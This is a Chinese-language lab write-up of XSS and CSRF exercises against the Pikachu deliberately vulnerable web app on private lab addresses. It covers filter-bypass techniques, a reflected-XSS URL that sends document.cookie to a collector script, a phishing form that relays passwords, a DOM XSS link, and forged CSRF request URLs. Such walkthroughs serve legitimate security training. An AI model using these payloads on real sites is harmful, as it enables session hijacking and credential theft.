web安全技术--XSS和CSRF

Xss一般是脚本代码,主要是JS的,但是也有AS和VBS的。

主要分为反射型,存储型,DOM型三个大类。

一般来讲在手工测试的时候先要考虑的地方就是哪里有输入那里有输出。

 

然后是进行敏感字符测试,通常来讲会把  < > " ' ( ) &?这样的敏感字符进行测试然后查看服务器有没有防御或者转义措施。

还与就是几个HTML标签的插入和一些不闭合标签的插入。看一看过滤和是否被HTML编码了。然后还可以看看不闭合是否过滤。

然后就是测试js代码

      同理prompt啊confirm啊或者是script 内部src 一下测试一下。然后就是测试Script的大小写修改看一看是否能够绕过。

然后看

ipt>alert(123)ipt>这样的套娃游戏绕过一次过滤看看

还有重点就是

如果数据没过滤就往里面href =" javascript:alert(123)">TEST一下是否可以JS

如果被过滤了JS字符的话那就试试大小写绕过一下。

然后如果可以绕过那么就测试一下事件,看看会不会被过滤。

事件被过滤就看看是黑名还是白名,测试一些边缘的EVENT比如onclimbatree等等一般人不会拿来用的事件。如果没有被过滤证明是黑名单,那就可以选择一些其他事件。还有非常多的可以测试和绕过的地方,不过本身就是一个攻防之间的事情。。。策略上是非常大的所以写不完了。

XSS可以拿来干很多事情。常见的是偷Cookie 改内容,挂马 重定向 蠕虫

首先是反射性XSS试验攻击盗取cookies

尝试构造了函数进行cookies获取

web安全技术--XSS和CSRF_第1张图片

 

 然后获取成功,生成的盗取COOKIES的URL是172.22.19.240/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F172.22.19.240%2Fpikachu%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

反射性xss post

试了一下没有限制输入

web安全技术--XSS和CSRF_第2张图片

 

 修改了服务器的post.html文件,然后通过让对方访问我的http://172.22.19.240/pikachu/pkxss/xcookie/post.html就可以了

 

 

存储型xss

插一下看一看能不能插入js代码

web安全技术--XSS和CSRF_第3张图片

 

 

 

web安全技术--XSS和CSRF_第4张图片

 

 弹窗成功

尝试使用钓鱼

web安全技术--XSS和CSRF_第5张图片

插入js代码

web安全技术--XSS和CSRF_第6张图片

 

 web安全技术--XSS和CSRF_第7张图片

web安全技术--XSS和CSRF_第8张图片

 

 

 

 web安全技术--XSS和CSRF_第9张图片

 

 

 

 输入密码后信息转给172.22.38.205\pikachu\pkxss\xfish\xfish.php发送给后台数据库

这板子应该是得重装才能第二次用了。

DOM型XSS

先测试一下有没有输入妨碍,发现

web安全技术--XSS和CSRF_第10张图片

 

 

 web安全技术--XSS和CSRF_第11张图片

 

 

 找得到,在这个位置。发现标签闭合问题。直接选择“>闭合前面的标签。然后可以后面再插入一个鼠标扫过触发'>

web安全技术--XSS和CSRF_第12张图片

 

 

 但是在抓包过程中发现GET是没有发送参数的。

然后是DOM XSS x的

发现这个地方是进行传参的,就是说可以把这个URL发送给其他人让他们点击来执行代码'>

 

web安全技术--XSS和CSRF_第13张图片

 

 

 发现能利用这个URL来使对方触发http://172.22.38.205/pikachu/vul/xss/xss_dom_x.php?text=%27%3E+%3Cimgsrc%3D%22231%22+onmouseover%3Dalert%28%22222%22%29%3E

盲打

web安全技术--XSS和CSRF_第14张图片

 

首先尝试定位,发现搜不到,无法得到位置那就尝试直接闭合写

web安全技术--XSS和CSRF_第15张图片

 

 

 也没找到。。。进入后台发现

 web安全技术--XSS和CSRF_第16张图片

 

发现什么都没有。。。直接插入JS代码就可以了web安全技术--XSS和CSRF_第17张图片

 

 

 

web安全技术--XSS和CSRF_第18张图片

 

 

 XSS过滤

还是先定位+测试字符过滤

 

 web安全技术--XSS和CSRF_第19张图片

开始测试JS代码

web安全技术--XSS和CSRF_第20张图片

 

 

 

全没了。套娃也不成,应该是过滤了alert(1)

但是结果依然。套娃失败。但是发现是个垃圾过滤。直接大小写玩法就给绕过了

web安全技术--XSS和CSRF_第21张图片

 

 

 看样子不是什么好过滤,那

xss的HTML特殊字符

直接注

查看了一下

web安全技术--XSS和CSRF_第22张图片

插了一下JS。直接成功

 

web安全技术--XSS和CSRF_第23张图片

 

 

 

 不过看了一下,貌似输入的字符很多都被转了。但是EVENT应该是可以触发的。

xss之href输出

因为提示是这个href输出,所以猜测一下里面是

发现“被过滤了。。"'<>??&?/

那就是直接插入JS了javascript:alert(123)

web安全技术--XSS和CSRF_第24张图片

 

 

 

依然可以

xss之js输出

依然是瞎写入AAAAAAAAAAAAAa<>'"?%&

然后定位了web安全技术--XSS和CSRF_第25张图片

 

 

发现在这个位置貌似也没过滤

先试着闭合一下然后注释后面

' -- 

web安全技术--XSS和CSRF_第26张图片

 

 可以。

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF

CSRF(get)

那就先抓包看看GET发送的到底是个什么URL

web安全技术--XSS和CSRF_第27张图片

 

 

 web安全技术--XSS和CSRF_第28张图片

 

 

 GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit这个是传递的URL。发现在参数内貌似没有账号相关。

那就直接URL构成172.22.38.205//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit点就完事了

web安全技术--XSS和CSRF_第29张图片

 

 CSRF之post

这个也是一样构成一个POST文件123.html就可以了。。

构成了一个用来post的HTML文件直接访问http://172.22.38.205/pikachu/123.html

123.html







   
   
   
   
   




然后就web安全技术--XSS和CSRF_第30张图片

CSRF 之TOKEN防御

TOKEN防御的问题就在于TOKEN够不够难

首先测试了一下是GET的方式。

web安全技术--XSS和CSRF_第31张图片

 

 不过这个难度比较大。。因为CSRF的TOKEN更新机制有关,比较麻烦,防范策略比较多,1分钟刷新一次或者一个网页一个TOKEN这种基本打不了。

但是实际上还有的TOKEN是不变或者是每次登入到登出都不变的就可以恶心恶心他了。可以打组合拳。XSS+CSRF有概率成功。这个还是不太好的策略,不过打比较弱的是可以的。

你可能感兴趣的:(web安全技术--XSS和CSRF)